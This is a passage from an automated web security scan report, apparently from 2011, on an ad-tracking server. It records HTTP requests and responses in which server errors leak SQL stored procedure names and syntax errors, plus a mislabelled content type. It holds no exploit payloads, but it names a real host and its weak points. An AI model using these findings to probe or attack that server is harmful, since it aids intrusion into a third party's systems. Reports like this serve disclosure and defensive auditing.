Path:   /Tracking/V2/BannerCreative/Clickthrough/

Request

GET /Tracking/V2/BannerCreative/Clickthrough/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:26 GMT
Expires: Tue, 08 Mar 2011 12:14:27 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSTTDRTQ=NBGGJOMCHKLPDGNCJANMJNGO; path=/
X-Powered-By: ASP.NET
Content-Length: 250
Connection: Close

An error occurred on the server when processing the URL. Please contact the system administrator. <p/> If you are the system administrator please click <a href="http://go.microsoft.com/fwlink/?LinkID=
...[SNIP]...

5.2. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Request

GET /Tracking/V2/BannerCreative/Impression/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:28 GMT
Expires: Tue, 08 Mar 2011 12:15:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQTRDSSR=ACJNLOMCMADFPAMBGNBNDGJI; path=/
X-Powered-By: ASP.NET
Content-Length: 620
Connection: Close

<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = , @bannerCreativeAdModuleId = undefined, @campaignId = undefined, @syndicationOutletId = undefine
...[SNIP]...

5.3. http://trk.vindicosuite.com/Tracking/V3/Instream/Clickthrough/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V3/Instream/Clickthrough/

Request

GET /Tracking/V3/Instream/Clickthrough/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:31 GMT
Expires: Tue, 08 Mar 2011 12:14:31 GMT
P3P: CP="CAO PSA OUR"
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQAADTRTS=IOBIJDNCOOAIEOEIDGKOBDBG; path=/
X-Powered-By: ASP.NET
Content-Length: 804
Connection: Close

<div style ='font-family:verdana;font-size:11px'><br><img src = 'http://broadbandenterprises.com/emailLogo.gif'/><br><b>Error</b>:<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_Instrea
...[SNIP]...

6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://trk.vindicosuite.com
Path:   /Tracking/V2/BannerCreative/Impression/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /Tracking/V2/BannerCreative/Impression/ HTTP/1.1
Host: trk.vindicosuite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VINDICOAUDIENCEISSUEDIDENTITY=55be4d72-6815-4aa7-8066-9042bb4a2d39; vpp=55be4d72-6815-4aa7-8066-9042bb4a2d39; 24f41fb8-0c1f-4eaf-9894-45c90d2c3306_vpp=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Date: Tue, 08 Mar 2011 12:15:28 GMT
Expires: Tue, 08 Mar 2011 12:15:28 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQTRDSSR=ACJNLOMCMADFPAMBGNBNDGJI; path=/
X-Powered-By: ASP.NET
Content-Length: 620
Connection: Close

<br>Error Description:Incorrect syntax near ','.<br>SQL:[Track_BannerCreativeImpression_V.1] @siteId = , @bannerCreativeAdModuleId = undefined, @campaignId = undefined, @syndicationOutletId = undefine
...[SNIP]...

Report generated by XSS.CX at Tue Mar 08 07:51:30 CST 2011.